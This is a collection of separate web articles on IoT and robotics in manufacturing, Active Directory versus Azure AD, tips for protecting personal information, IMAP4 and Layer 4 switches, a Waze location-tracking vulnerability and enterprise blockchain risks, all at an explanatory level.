In addition to optimizing internal processes, IoT solutions are revolutionizing supply chain management. By enabling real-time tracking of goods, manufacturers can better manage inventory levels, reduce carrying costs, and improve the speed and reliability of deliveries. These capabilities are crucial in an era where responsiveness and agility are key competitive differentiators. The enhanced visibility offered by IoT allows supply chains to be more adaptable and resilient, ensuring steady and predictable production lines that can meet market demands more effectively.
Enhancing Supply Chain Efficiency
The digitization of supply chains through IoT technologies enhances their resilience and adaptability. By leveraging real-time data, manufacturers can anticipate and respond to potential disruptions more effectively, ensuring a more stable supply chain. This proactive approach helps to mitigate risks from external challenges, such as geopolitical tensions, natural disasters, or sudden market shifts, thus maintaining consistent production levels and minimizing the impact on overall operations.
Furthermore, IoT-enabled supply chains foster improved resource management. Automated systems can dynamically adjust production schedules and material orders based on real-time demand and inventory levels. This capability streamlines operations and reduces waste and costs associated with overproduction or excess inventory. The efficient management of resources ensures that manufacturers can meet demand without holding costly surplus stock, leading to more sustainable and cost-effective production practices that align with modern environmental and economic goals.
Key Industry Trends
Addressing Skilled Labor Shortage
A persistent challenge in the manufacturing sector is the shortage of skilled labor. The integration of AI, robotics, and IoT serves as a strategic response to this issue by automating routine and labor-intensive tasks. This automation allows manufacturers to free up their human workforce for more complex and value-added activities, mitigating the impact of labor shortages and enhancing overall workplace productivity. It also empowers existing employees to focus on tasks that require human ingenuity and problem-solving abilities.
Moreover, the adoption of smart factory solutions attracts a new generation of tech-savvy workers who are drawn to innovative and technologically advanced environments. By presenting themselves as cutting-edge employers, manufacturing companies can better compete in the labor market, positioning themselves as desirable workplaces for young professionals interested in technology and innovation. This shift not only addresses the immediate labor shortage but also builds a more capable and future-ready workforce that can drive the industry forward.
Enhancing Customer Service and Market Differentiation
In an increasingly competitive market, superior customer service and differentiated offerings are crucial for maintaining a competitive edge. Leveraging AI and IoT technologies enables manufacturers to deliver personalized and responsive customer experiences. Real-time data gathered from IoT devices allows manufacturers to respond quickly and accurately to customer inquiries, while AI-powered analytics provide insights into customer preferences and behaviors. These technologies facilitate more targeted marketing strategies and the development of products that better meet consumer needs.
Investing in superior aftermarket services, such as predictive maintenance suggestions and automatic replenishment systems, enhances customer satisfaction and creates new revenue streams. These value-added services not only differentiate manufacturers from their competitors but also build long-term customer loyalty by providing ongoing support and innovation. By continually meeting and exceeding customer expectations, manufacturers can secure their position in the market and foster lasting relationships with their clientele.
Influence of Recent Legislative Acts
Recent legislative acts, such as the Infrastructure Investment and Jobs Act (IIJA), the Creating Helpful Incentives to Produce Semiconductors (CHIPS) and Science Act, and the Inflation Reduction Act (IRA), have significantly impacted the manufacturing sector. These acts have driven up construction spending and stimulated demand, contributing to the sector’s growth despite challenges such as geopolitical tensions, labor shortages, and supply chain disruptions. The financial incentives and support provided by these legislative measures enable manufacturers to invest more confidently in advanced technologies.
This increased investment has accelerated the adoption of AI, robotics, and IoT, propelling the industry forward and setting a foundation for future growth. The legislative focus on technology and infrastructure creates a conducive environment for innovation, encouraging manufacturers to explore and integrate sophisticated solutions. This proactive approach not only enhances the resilience and competitiveness of the manufacturing sector but also prepares it to meet emerging global challenges and opportunities.
Proactive Adaptation and Strategic Investments
Companies like Steel Craft exemplify proactive adaptation to technological advancements. By integrating robotics and automation, particularly in laser-cutting and brake press operations, Steel Craft has successfully extended its lights-out manufacturing capabilities, operating with minimal human intervention. This strategic investment maximizes operational efficiencies, allowing the company to respond quickly to market demands while maintaining high levels of precision and quality.
The broader trend of incremental investment in technology highlights the importance of a balanced approach. Manufacturers must strategically manage workforce transitions, providing upskilling opportunities and integrating new technologies gradually. This ensures that human workers remain a critical component of the manufacturing process, supported by advanced tools that enhance their capabilities rather than replace them. Through the thoughtful integration of robotics, AI, and IoT, companies can achieve a harmonious blend of human and machine collaboration, ensuring sustainable growth and operational excellence.
The rise of artificial intelligence (AI), robotics, and the Internet of Things (IoT) is fundamentally transforming the manufacturing industry. These technological advancements are empowering manufacturers to achieve unprecedented levels of productivity, significantly boost cost-efficiency, and enhance the quality of their products. By leveraging AI, companies can optimize their production processes, anticipate maintenance needs, and reduce downtime. Robotics, on the other hand, automates repetitive tasks, increases precision, and decreases human error, leading to higher standards of product consistency and quality. The integration of IoT facilitates real-time monitoring and data collection, enabling manufacturers to make informed decisions quickly and efficiently. These technologies are not only streamlining operations but also fostering innovation, driving competitiveness, and setting new benchmarks in the manufacturing sector. This article delves into how AI, robotics, and IoT are reshaping the modern manufacturing landscape, highlighting the immense potential and challenges these advancements bring to the industry. | <urn:uuid:7909ca7b-239e-4f2d-a7db-7b77b85bc2e6> | CC-MAIN-2024-38 | https://manufacturingcurated.com/manufacturing-technology/how-are-ai-robotics-and-iot-transforming-modern-manufacturing/ | 2024-09-10T04:08:16Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651196.36/warc/CC-MAIN-20240910025651-20240910055651-00092.warc.gz | en | 0.924357 | 1,771 | 3.265625 | 3 |
AD vs Azure AD – confused about the difference? We get it – the distinction isn’t immediately clear.
Note: Microsoft renamed Azure AD to Entra ID in 2023
In this guide, we’ll be exploring the key differences between Active Directory (AD), Azure Active Directory (Azure AD) and their relevance to you.
What Is Active Directory?
AD stands for Active Directory. In order to understand what Active Directory is, you’ll need to understand the basics of a Domain Controller.
A Domain Controller is a server on the network that centrally manages access for users, PCs and servers on the network. It does this using AD.
Active Directory is a database that organises your company’s users and computers. It provides authentication and authorization to applications, file services, printers, and other resources on the network. It uses protocols such as Kerberos and NTLM for authentication and LDAP to query and modify items in the Active Directory databases.
Key Functions of AD
Active Directory Domain Services (to give it its full and proper name) runs on the Domain Controller and provides the following key functions:
- Secure Object store, including Users, Computers and Groups
- Object organization – Organisational Units (OU), Domains and Forests
- Common Authentication and Authorization provider
- LDAP, NTLM, Kerberos (secure authentication between domain joined devices)
- Group Policy – for fine grained control and management of PCs and Servers on the domain
So basically AD has a record of all your users, PCs and Servers and authenticates the users signing in (the network logon). Once signed in, AD also governs what the users are, and are not, allowed to do or access (authorisation). For example, it knows that John Smith is in the Sales Group and is not allowed to access the HR folder on the file server. It also allows control and management of PCs and Servers on the network via Group Policy (so for example you could set all users’ home page on their browser to be your intranet, or you can prevent users from installing other software etc).
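To make the authorisation idea concrete, here is a toy sketch in Python (purely illustrative: real AD evaluates access control lists on directory objects, and the user, group, and folder names here are made up):

```python
# Toy model of group-based authorisation (illustrative only; real AD evaluates
# ACLs on objects rather than a simple dict). All names here are hypothetical.
GROUP_MEMBERS = {
    "Sales": {"john.smith", "mary.jones"},
    "HR": {"pat.lee"},
}

FOLDER_ACCESS = {
    r"\\fileserver\Sales": {"Sales"},
    r"\\fileserver\HR": {"HR"},
}

def is_authorised(user: str, folder: str) -> bool:
    """Authorised if the user belongs to any group granted access to the folder."""
    allowed_groups = FOLDER_ACCESS.get(folder, set())
    return any(user in GROUP_MEMBERS.get(g, set()) for g in allowed_groups)

# John Smith is in Sales, so he can reach the Sales share but not HR
assert is_authorised("john.smith", r"\\fileserver\Sales")
assert not is_authorised("john.smith", r"\\fileserver\HR")
```

The point of centralising this on a Domain Controller is that every file server, printer, and application consults the same store, rather than each keeping its own user list.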
Most established businesses will have AD running on one or more Domain Controllers on their network.
What are the Azure Active Directory benefits?
Azure AD Benefit 1
Azure AD is not simply a cloud version of AD as the name might suggest. Although it performs some of the same functions, it is quite different.
Azure Active Directory is a secure online authentication store, which can contain users and groups. Users have a username and a password which are used when you sign into an application that uses Azure AD for authentication. So for example all of the Microsoft Cloud services use Azure AD for authentication: Office 365, Dynamics 365 and Azure. If you have Office 365, you are already using Azure AD under the covers.
Azure AD Benefit 2
As well as managing users and groups, Azure AD manages access to applications that work with modern authentication mechanisms like SAML and OAuth. Applications are an object that exist in Azure AD, and this allows you to create an identity for your applications (or 3rd party ones) that you can grant access for users to. Besides seamlessly connecting to any Microsoft Online Services, Azure AD can connect to thousands of SaaS applications (e.g. Salesforce, Slack, ZenDesk etc) using a single sign-on.
When compared with AD, here is what Azure AD doesn’t do:
- You can’t join a server to it
- You can’t join a PC to it in the same way – there is Azure AD Join for Windows 10 only (see later)
- There is no Group Policy
- There is no support for LDAP, NTLM or Kerberos
- It is a flat directory structure – no OUs or Forests
So Azure AD does not replace AD.
AD is great at managing traditional on-premise infrastructure and applications. Azure AD is great at managing user access to cloud applications. They do different things with the area of overlap being user management.
AD vs Azure AD – should you use one, the other or both?
If you have a traditional on-premise set up with AD and also want to use Azure AD to manage access to cloud applications (e.g. Office 365 or any of thousands of SaaS apps) then you can happily use both.
If you are using Office 365 then your users will have a username and password for that (managed by Azure AD), as well as a username and password for their network logon (managed by AD). These two sets of credentials are unrelated. This is fine, and just means that if you have a password change policy, users will have to change their password twice (and they could of course choose the same password for both).
Or you can synchronise AD with Azure AD so that the users only have one set of credentials which they use for both their network logon, and access to O365. You use Azure AD Connect to do this, it is a small free piece of Microsoft software that you install on a server to perform the synchronisation.
If you are a new business or one that is looking to transition away from having any traditional on-premise infrastructure and using purely cloud based applications, then you can operate purely using Azure AD.
In this case, although you will have all your applications in the cloud, you will of course still have physical devices – PCs and smart phones – that your team will use to access and work with these cloud applications.
So how do you secure and manage these devices?
In the case of PCs (this applies to Windows 10 only), you can Azure AD Join them and log in to the machines using Azure AD user accounts. You can apply conditional access policies that require machines to be Azure AD joined before accessing company resources or applications. However, Azure AD Join provides limited functionality compared to AD Join (as there is no Group Policy), so in order to gain fine-grained control over the PCs you would then use a Mobile Device Management solution, such as Microsoft Intune, in addition to this.
Other devices (Windows 10, iOS, Android, and MacOS) can be Azure AD Registered (which means you sign into the device itself without requiring an Azure AD account, but can then access apps etc using the Azure AD account) and controlled using Microsoft Intune.
If you can’t get all your applications as SaaS apps and have some that still need to run on your own servers, then you can migrate these to Virtual Machines (VMs) in Azure. If those VMs need to be domain joined, then you can either deploy a Domain Controller on another VM in Azure, or you can use Azure Active Directory Domain Services (Azure AD DS) which is a PaaS service (you don’t have to manage it) for domain joining Azure VMs. Azure AD DS automatically synchronises with Azure AD so all your users get the application access you want.
AD vs Azure AD Summary
In Summary, Azure AD is not simply a cloud version of AD, they do quite different things. AD is great at managing traditional on-premise infrastructure and applications. Azure AD is great at managing user access to cloud applications. You can use both together, or if you want to have a purely cloud based environment you can just use Azure AD.
Want to know more?
If you want to know more about the difference between AD vs Azure AD, Compete366 is here to help.
Contact Compete366 for a free discussion with one of our Office 365 or Azure consultants on how to take advantage of Azure AD and Azure, as well as to learn more about how to reduce your IT spend with ideal pricing.
Whether it tags along via a smartphone, laptop, tablet, or wearable, it seems like the internet follows us wherever we go nowadays. Yet there’s something else that follows us around as well — a growing body of personal info that we create while banking, shopping, and simply browsing the internet. And no doubt about it, our info is terrifically valuable.
What makes it so valuable? It’s no exaggeration to say that your personal info is the key to your digital life, along with your financial and civic life as well. Aside from using it to create accounts and logins, it’s further tied to everything from your bank accounts and credit cards to your driver’s license and your tax refund.
Needless to say, your personal info is something that needs protecting, so let’s check out several ways you can do just that.
What is personal info?
What is personal info? It’s info about you that others can use to identify you either directly or indirectly. Thus, that info could identify you on its own. Or it could identify you when it’s linked to other identifiers, like the ones linked with the devices, apps, tools, and protocols you use.
A prime example of direct personal info is your tax ID number because it’s unique and directly tied to your name. Further instances include your facial image to unlock your smartphone, your medical records, your finances, and your phone number because each of these can be easily linked back to you.
Then there are those indirect pieces of personal info that act as helpers. While they might not identify you on their own, a few of them can when they’re added together. These helpers include things like internet protocol addresses, the unique device ID of your smartphone, or other identifiers such as radio frequency identification tags.
You can also find pieces of your personal info in the accounts you use, like your Google or Apple IDs, which can be linked to your name, your email address, and the apps you have. You’ll also find it in the apps you use. For example, there’s personal info in the app you use to map your walks and runs, because the combination of your smartphone’s unique device ID and GPS tracking can be used in conjunction with other info to identify who you are. Not to mention where you typically like to do your 5k hill days. The same goes for messenger apps, which can collect how you interact with others, how often you use the app, and your location info based on your IP address, GPS info, or both.
In all, there’s a cloud of personal info that follows us around as we go about our day online. Some wisps of that cloud are more personally identifying than others. Yet gather enough of it, and your personal info can create a high-resolution snapshot of you — who you are, what you’re doing, when you’re doing it, and even where you’re doing it, too — particularly if it gets into the wrong hands.
Remember Pig-Pen, the character straight from the old funny pages of Charles Schulz’s Charlie Brown? He’s hard to forget with that ever-present cloud of dust following him around. Charlie Brown once said, “He may be carrying the soil that was trod upon by Solomon or Nebuchadnezzar or Genghis Khan!” It’s the same with us and our personal info, except the cloud surrounding us isn’t the dust of kings and conquerors. It’s made up of motes of info that are of tremendously high value to crooks and bad actors, whether for purposes of identity theft or invasion of privacy.
Protecting your personal info protects your identity and privacy
With all the personal info we create and share on the internet, that calls for protecting it. Otherwise, our personal info could fall into the hands of a hacker or identity thief and end up getting abused, in potentially painful and costly ways.
Here are several things you can do to help ensure that what’s private stays that way:
1) Use a complete security platform that can also protect your privacy.
Square One is to protect your devices with comprehensive online protection software. This defends you against the latest virus, malware, spyware, and ransomware attacks, and it further protects your privacy and identity. It can also provide strong password protection by generating and automatically storing complex passwords to keep your credentials safer from hackers and crooks who might try to force their way into your accounts.
Further, security software can also include a firewall that blocks unwanted traffic from entering your home network, such as an attacker poking around for network vulnerabilities so that they can “break in” to your computer and steal info.
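As an aside, the password generation such tools perform can be sketched in a few lines of Python using a cryptographically secure random source (this is a generic illustration, not any particular product's implementation; the length and symbol set are arbitrary choices):

```python
# Minimal sketch of random password generation using a cryptographically
# secure source (Python's secrets module). Not any specific product's code.
import secrets
import string

def generate_password(length: int = 16) -> str:
    alphabet = string.ascii_letters + string.digits + "!@#$%^&*"
    return "".join(secrets.choice(alphabet) for _ in range(length))

pw = generate_password()
print(pw)  # e.g. 'q7#VfK...' -- different on every run
```

The important design choice is `secrets` rather than the `random` module: the latter is predictable and unsuitable for anything security-related.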
2) Use a VPN.
Also known as a virtual private network, a VPN helps protect your vital personal info and other data with bank-grade encryption. The VPN encrypts your internet connection to keep your online activity private on any network, even public networks. Using a public network without a VPN can increase your risk because others on the network can potentially spy on your browsing and activity.
If you’re new to the notion of using a VPN, check out this article on VPNs and how to choose one so that you can get the best protection and privacy possible. (Our McAfee+ plans offer a VPN as part of your subscription.)
3) Keep a close grip on your Social Security Number.
In the U.S., the Social Security Number (SSN) is one of the most prized pieces of personal info as it unlocks the door to employment, finances, and much more. First up, keep a close grip on it. Literally. Store your card in a secure location. Not your purse or wallet.
Certain businesses and medical practices might ask you for your SSN for billing purposes and the like. You don’t have to provide it (although some businesses could refuse service if you don’t), and you can always ask if they will accept some alternative form of info. However, there are a handful of instances where an SSN is a requirement. These include:
- Employment or contracting with a business.
- Group health insurance.
- Financial and real estate transactions.
- Applying for credit cards, car loans, and so forth.
Be aware that hackers often get a hold of SSNs because the organization holding that info gets hacked or compromised itself. Minimizing how often you provide your SSN can offer an extra degree of protection.
4) Protect your files.
Protecting your files with encryption is a core concept in data and info security, and thus it’s a powerful way to protect your personal info. It involves transforming data or info into code that requires a digital key to access it in its original, unencrypted format. For example, McAfee+ includes File Lock, which is our file encryption feature that lets you lock important files in secure digital vaults on your device.
Additionally, you can delete sensitive files with an application such as McAfee Shredder, which securely deletes files so that thieves can’t access them. (Quick fact: deleting files in your trash doesn’t delete them in the truest sense. They’re still there until they’re “shredded” or otherwise overwritten such that they can’t be restored.)
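To illustrate the idea behind “shredding,” here is a simplified Python sketch that overwrites a file with random bytes before deleting it. Real shredding tools make multiple passes and must handle complications such as SSD wear-leveling and journaling filesystems, so treat this as the concept only, not a secure deletion tool:

```python
# Simplified sketch of "shredding": overwrite a file's bytes before deleting it,
# so the old contents aren't simply left behind on disk. Concept only -- real
# shredders must account for SSDs, journaling filesystems, and backups.
import os
import secrets
import tempfile

def shred(path: str, passes: int = 3) -> None:
    """Overwrite a file's contents with random bytes, then delete it."""
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        for _ in range(passes):
            f.seek(0)
            f.write(secrets.token_bytes(size))  # overwrite with random bytes
            f.flush()
            os.fsync(f.fileno())                # push the overwrite to disk
    os.remove(path)

# Demo on a throwaway file
path = os.path.join(tempfile.mkdtemp(), "secret.txt")
with open(path, "w") as f:
    f.write("my tax ID: 000-00-0000")
shred(path)
assert not os.path.exists(path)
```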
5) Steer clear of those internet “quizzes.”
Which Marvel Universe superhero are you? Does it really matter? After all, such quizzes and social media posts are often grifting pieces of your personal info in a seemingly playful way. While you’re not giving up your SSN, you might be giving up things like your birthday, your pet’s name, your first car…things that people often use to compose their passwords or use as answers to common security questions on banking and financial sites. The one way to pass this kind of quiz is not to take it!
6) Be on the lookout for phishing attacks.
A far more direct form of separating you from your personal info is phishing attacks. Posing as emails from known or trusted brands, financial institutions, or even a friend or family member, a scammer’s attack will try to trick you into sharing important info like your logins, account numbers, credit card numbers, and so on under the guise of providing customer service.
How do you spot such emails? Well, it’s getting a little tougher nowadays because scammers are getting more sophisticated and can make their phishing emails look increasingly legitimate. Even more so with AI tools. However, there are several ways you can spot a phishing email and phony websites. Moreover, our McAfee Scam Protection can do it for you.
7) Keep mum in your social media profile.
You can take two steps to help protect your personal info from being at risk via social media. One, think twice about what you share in that post or photo — like the location of your child’s school or the license plate on your car. Two, set your profile to private so that only friends can see it. Social media platforms like Facebook, Instagram, and others give you the option of making your profile and posts visible to friends only. Choosing this setting keeps the broader internet from seeing what you’re doing, saying, and posting, which can help protect your privacy and gives a scammer less info to exploit. Using our Social Privacy Manager can make that even easier. With only a few clicks, it can adjust more than 100 privacy settings across your social media accounts — making them more private as a result.
8) Look for HTTPS when you browse.
The “S” stands for secure. Any time you’re shopping, banking, or sharing any kind of personal info, look for “https” at the start of the web address. Some browsers also indicate HTTPS by showing a small “lock” icon. Doing otherwise on plain HTTP sites exposes your personal info for anyone who cares to monitor that site for unsecured connections.
9) Lock your devices.
By locking your devices, you protect yourself that much better from personal info and data theft in the event your device is lost, stolen, or even left unattended for a short stretch. Use your password, PIN, facial recognition, thumbprint ID, what have you. Just lock your stuff. In the case of your smartphones, read up on how you can locate your phone or even wipe it remotely if you need to. Apple provides iOS users with a step-by-step guide for remotely wiping devices, and Google offers up a guide for Android users as well.
10) Keep tabs on your credit — and your personal info.
Theft of your personal info can lead to credit cards and other accounts being opened falsely in your name. What’s more, it can take some time before you even become aware of it, such as when your credit score takes a hit or a bill collector comes calling. By checking your credit, you can fix any issues that come up, as companies typically have a clear-cut process for contesting any fraud. You can get a free credit report in the U.S. via the Federal Trade Commission (FTC) and likewise, other nations like the UK have similar free offerings as well.
Consider identity theft protection as well. A strong identity theft protection package pairs well with keeping track of your credit and offers cyber monitoring that scans the dark web to detect misuse of your personal info. With our identity protection service, we help relieve the burden of identity theft if the unfortunate happens to you with $2M coverage for lawyer fees, travel expenses, lost wages, and more.
Definition of Internet Mail Access Protocol version 4 (IMAP4) in Network Encyclopedia.
What is IMAP4 (Internet Mail Access Protocol version 4)?
IMAP4, which stands for Internet Mail Access Protocol version 4, is an Internet standard protocol for storing and retrieving messages from Simple Mail Transfer Protocol (SMTP) hosts. Internet Mail Access Protocol version 4 (IMAP4) provides functions similar to Post Office Protocol version 3 (POP3), with additional features as described in this entry.
How it works
SMTP provides the underlying message transport mechanism for sending e-mail over the Internet, but it does not provide any facility for storing and retrieving messages. SMTP hosts must be continuously connected to one another, but most users do not have a dedicated connection to the Internet.
IMAP4 provides mechanisms for storing messages received by SMTP in a receptacle called a mailbox. An IMAP4 server stores messages received by each user until the user connects to download and read them using an IMAP4 client such as Microsoft Outlook 2000 or Microsoft Outlook Express.
IMAP4 includes a number of features that are not supported by POP3. Specifically, IMAP4 allows users to
- Access multiple folders, including public folders
- Create hierarchies of folders for storing messages
- Leave messages on the server after reading them so that they can access the messages again from another location
- Search a mailbox for a specific message to download
- Flag messages as read
- Selectively download portions of messages or attachments only
- Review the headers of messages before downloading them
To retrieve a message from an IMAP4 server, an IMAP4 client first establishes a Transmission Control Protocol (TCP) session using TCP port 143. The client then identifies itself to the server and issues a series of IMAP4 commands:
- LIST: Retrieves a list of folders in the client’s mailbox
- SELECT: Selects a particular folder to access its messages
- FETCH: Retrieves individual messages
- LOGOUT: Ends the IMAP4 session
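The command sequence above can be sketched with Python's standard `imaplib` module. The host, user, and password below are placeholders, not real values; the sketch mirrors the LIST/SELECT/FETCH/LOGOUT flow described in this entry.

```python
# Sketch of the IMAP4 retrieval flow using Python's standard imaplib
# module. Host, user, and password are placeholders, not real values.
import imaplib

def fetch_first_message(host, user, password, folder="INBOX"):
    conn = imaplib.IMAP4(host, 143)      # TCP session on port 143
    try:
        conn.login(user, password)       # client identifies itself
        conn.list()                      # LIST: folders in the mailbox
        conn.select(folder)              # SELECT: pick a folder
        typ, data = conn.search(None, "ALL")
        ids = data[0].split()
        if not ids:
            return None
        typ, msg = conn.fetch(ids[0], "(RFC822)")  # FETCH one message
        return msg[0][1]
    finally:
        conn.logout()                    # LOGOUT: end the session
```

Note that, unlike POP3, the message stays in the server-side folder unless it is explicitly deleted, which is what enables access from multiple locations.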
IMAP4 is supported by Microsoft Exchange Server. Because IMAP4 clients can allow read messages to remain on the IMAP4 server, IMAP4 is especially useful for mobile users who dial up and access their mail from multiple locations. The downside is that IMAP4 servers require more resources than POP3 servers because users tend to leave large numbers of messages on the server.
To troubleshoot problems with remote IMAP4 servers, use Telnet to connect to port 143. Then try issuing various IMAP4 commands such as the ones described in this entry and examine the results.
Essentially, a Layer 4 Switch is a Layer 3 switch that is capable of examining layer 4 of each packet that it switches. In TCP/IP networking, this is equivalent to examining the Transmission Control Protocol (TCP) layer information in the packet.
Vendors tout Layer 4 switches as being able to use TCP information for prioritizing traffic by application. For example, to prioritize Hypertext Transfer Protocol (HTTP) traffic, a Layer 4 switch would give priority to packets whose layer 4 (TCP) information includes TCP port number 80, the standard port number for HTTP communication.
Some vendors foresee higher-layer switches that examine layer 5, 6, or 7 information to provide more control over prioritizing application traffic, but this might be just vendor hype.
What is a Layer 4 Switch?
The Layer 4 switch, often referred to as a “layer 3 switch with enhancements” or a “layer 3 switch that understands layer 4 protocols,” represents an advanced breed of network switch. While traditional switches operate at the data link layer (Layer 2) of the OSI model, the Layer 4 switch extends its purview to the transport layer. It goes beyond merely analyzing the source and destination MAC addresses and ventures into the examination of port numbers and specific transport-layer protocols such as TCP and UDP.
This heightened capability allows the Layer 4 switch to provide more granular control over network traffic, enabling functions like Quality of Service (QoS), traffic prioritization, and security enhancements. The Layer 4 switch’s unique understanding of both network and transport layer information enables more efficient routing decisions and facilitates complex network management tasks that go beyond mere packet switching. It is a critical component in building modern, intelligent, and responsive networks.
A cloud data center, such as a Google or Microsoft data center, provides many applications concurrently, such as search, email, and video applications. To support requests from external clients, each application is associated with a publicly visible IP address to which clients send their requests and from which they receive responses. Inside the data center, the external requests are first directed to a load balancer whose job it is to distribute requests to the hosts, balancing the load across the hosts as a function of their current load.
A large data center will often have several load balancers, each one devoted to a set of specific cloud applications. Such a load balancer is sometimes referred to as a “layer-4 switch” since it makes decisions based on the destination port number (layer 4) as well as destination IP address in the packet. Upon receiving a request for a particular application, the load balancer forwards it to one of the hosts that handles the application. (A host may then invoke the services of other hosts to help process the request.)
When the host finishes processing the request, it sends its response back to the load balancer, which in turn relays the response back to the external client. The load balancer not only balances the work load across hosts, but also provides a NAT-like function, translating the public external IP address to the internal IP address of the appropriate host, and then translating back for packets traveling in the reverse direction back to the clients.
This prevents clients from contacting hosts directly, which has the security benefit of hiding the internal network structure and preventing clients from directly interacting with the hosts.
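The forwarding decision such a layer-4 load balancer makes can be sketched as follows. The application pools and addresses are invented for illustration; real balancers add health checks and connection tracking on top of this.

```python
# Toy sketch of a layer-4 forwarding decision: the balancer looks at the
# destination port to pick an application pool, then hashes the flow's
# 4-tuple so one TCP connection always lands on the same backend host.
# The pools and addresses below are made up for illustration.
import hashlib

POOLS = {
    80:  ["10.0.1.11", "10.0.1.12", "10.0.1.13"],   # HTTP application
    443: ["10.0.2.21", "10.0.2.22"],                # HTTPS application
}

def pick_backend(src_ip, src_port, dst_ip, dst_port):
    pool = POOLS[dst_port]                       # layer-4 port selects the app
    key = f"{src_ip}:{src_port}:{dst_ip}:{dst_port}".encode()
    digest = hashlib.sha256(key).digest()
    index = int.from_bytes(digest[:4], "big") % len(pool)
    return pool[index]

# The same flow always maps to the same backend:
a = pick_backend("203.0.113.5", 50123, "198.51.100.1", 80)
b = pick_backend("203.0.113.5", 50123, "198.51.100.1", 80)
assert a == b and a in POOLS[80]
```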
In the category of being careful with location-based services when using apps, researchers at the University of California, Santa Barbara have discovered a vulnerability in the popular Waze app that permitted them to create “ghost drivers” that could monitor drivers in the vicinity and track them in real time.
Basically, the researchers were able to intercept communications between Waze and users’ phones by getting the phones to accept their computers as the connection between Waze and the users and could then reverse-engineer the Waze protocol. The researchers were then able to write a program that allowed them to create thousands of “ghost cars” and “ghost drivers” that could monitor the drivers around them.
The head of the research team exclaimed that “It’s such a massive privacy problem.” Another recent complaint since Waze updated its app in January is that when a user downloads it, it requests access to all of your contacts. It’s not clear why it needs your entire contact list to help you navigate from point A to point B. Just a reminder to read those pop-ups when you download an app.
According to a PwC survey (of 600 business executives in 15 countries), 84 percent of respondents are actively involved with blockchain. Blockchain is just one example of a distributed ledger technology (DLT), a digital system for recording the transaction of assets (money or data) without a central data store or admin functionality.
More companies are turning to DLTs like blockchain to help streamline their business, improve data transparency and reduce operational costs. From smart contracts that automate secure payments to managing customer interactions, blockchain can improve how we do business.
But, like any emerging technology, new risks and vulnerabilities can cause damage. We’ll get into that, but first, an important distinction.
Public vs. private distributed ledgers
A public ledger is an open network that anyone can join and contribute to. Public ledgers work best for cryptocurrencies, due to anonymity features and support for transactions across borders. Then there are private or enterprise DLTs. These identify and authorize users and determine their roles. Data is encrypted and only authorized users can operate on it.
Let’s explore private DLTs, which more companies are using for their benefits, from accelerated workflows to authenticating data.
DLTs usher in a new security paradigm. But for business process automation, there are risks to quash.
Joint ventures on blockchain
DLTs are great for joint ventures – notably because they act as both a registry and a financial database for payments and transactions between partners, which are logged and approved by all participants on the blockchain. It’s a trusted, transparent system – everyone authorized has access to data and knows how it’s logged. Essential features are decentralization (for data transparency and trust), scalability (which enables adding new participants to the network) and the use of smart contracts.
But centralization can create a security risk. Blockchain data is trusted when it’s distributed, so the more nodes (those who have access to the blockchain system, either computer programs or authorized users) that can approve transactions, the more you can trust the data. That’s why deploying blockchain within a single company or organization to secure data doesn’t make much sense as “consensus” comes from a sole authority.
Why one of the most successful enterprise blockchain platforms isn’t as secure as you think
One of the best known enterprise-grade platforms, Hyperledger Fabric, creates consensus using a permission voting algorithm. But how secure is it?
Once the majority of nodes in the blockchain validate the transaction, we reach consensus and finality (a new block or sequence is added to the ledger.) Hyperledger Fabric provides channels – isolated “subnets” of data exchange between specific network members. It’s useful for industrial and manufacturing scenarios where a blockchain may include potential competitors. The separate channels in Hyperledger Fabric can prevent data from being accessible to participants from outside of a designated channel.
But the consensus mechanism could be misconfigured. This might happen at the design and deployment stages, and it is often revealed too late to fix easily because, for users, everything seems to be working fine. A misconfigured mechanism can fail to involve all the nodes that should validate a transaction, even for transactions involving many participants across several channels. As a result, the consensus is limited to the validators of a single channel, who confirm adding the transaction to the blockchain.
Beware of blockchain after a cyberattack
Beware hacked user accounts. During a cyberattack, data could be tampered with and then submitted to the blockchain. For example, let’s say a user is attacked while approving commercial purchase agreements in a joint venture, further executed by a smart contract. If the attacker gets access to the contract, they can tamper with the supplier’s bank account and amount in the contract. The “correct” agreement will then trigger execution of a smart contract, meaning some or all of the money goes to the attacker.
Due to blockchain’s inherent immutability (i.e. it can’t be changed), it’s going to be very difficult (and expensive) to fix the incorrect data. What’s more, if this data gets into smart contracts, the issue will snowball and subsequently cause big problems. In this purchase agreement example, to fix the incorrect transaction, payment needs to be reconciled. But that’s not simple.
They can try to stop and revert a bank transaction, but blockchain can’t undo its immutable records. It will store information that a certain company (blockchain participant) has paid, whereas the supplier has not received the funds. It’s a double loss: companies spent a fortune on the blockchain solution, then get their money stolen.
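The immutability argument can be made concrete with a toy hash-linked ledger. This is a deliberately simplified model, not Hyperledger or any production blockchain: each block commits to the previous block's hash, so quietly editing an old record breaks the chain for every later block.

```python
# Toy hash-linked ledger showing why tampering with history is detectable:
# each block stores the hash of the previous block, so editing an old
# record invalidates every subsequent link. Simplified illustration only.
import hashlib, json

def block_hash(block):
    payload = json.dumps(block, sort_keys=True).encode()
    return hashlib.sha256(payload).hexdigest()

def append(chain, record):
    prev = block_hash(chain[-1]) if chain else "0" * 64
    chain.append({"prev": prev, "record": record})

def verify(chain):
    return all(chain[i]["prev"] == block_hash(chain[i - 1])
               for i in range(1, len(chain)))

ledger = []
append(ledger, {"pay": 100, "to": "supplier-account-A"})
append(ledger, {"pay": 250, "to": "supplier-account-B"})
assert verify(ledger)

ledger[0]["record"]["to"] = "attacker-account"   # tamper with history
assert not verify(ledger)                        # every peer notices
```

This is exactly why the stolen-payment scenario above is so hard to unwind: the record cannot be silently corrected, only contradicted by later entries.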
Blockchain risks for large enterprises and corporate groups
Similar blockchain technologies are used for transactions between banks or groups of banks. As the technologies are the same, they have the same vulnerabilities. This opens wide opportunities for an attacker: having performed a successful attack on one bank, they’re more likely to be more successful and quicker with the same attack on another member of the group.
If just one vulnerability of a single participant is exploited on the blockchain, there’s a huge cybersecurity risk for other participants on the same system, running the risk of a mass leak of sensitive financial or private data across a group.
Blockchain can cause a bottleneck
Blockchain is designed for transactions, so it works well for trading and integrates with financial systems to support the supply of goods, automated pricing and using smart contracts to execute financial transactions.
Smooth running in good times. But blockchain could also be a bottleneck. Lots of transactions are processed simultaneously, which a good platform should process rapidly. But if the system can’t handle the load, it can fail.
Getting blockchain right for your business
